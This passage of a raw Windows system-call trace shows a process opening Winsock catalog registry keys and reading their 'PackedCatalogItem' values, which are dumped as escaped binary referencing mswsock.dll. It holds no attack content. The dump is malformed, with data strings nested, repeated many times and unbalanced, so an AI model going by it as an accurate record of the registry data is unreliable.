a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\26\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0\34\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\34\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\35\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0\35\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\37\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\37\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\26\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0\34\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\34\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\35\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0\35\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\37\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02588 896 NtClose (220, ... ) == 0x0 02589 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000011"}, ... 220, ) }, ... 220, ) == 0x0 02590 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02591 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02592 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0$\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0$\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0$\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0$\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0!\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0"\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0#\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0$\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02593 896 NtClose (220, ... ) == 0x0 02594 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000012"}, ... 220, ) }, ... 220, ) == 0x0 02595 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02596 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02597 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\30\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0&\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0&\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0'\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\03\0'\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\30\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0&\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0&\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0'\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\03\0'\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\30\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 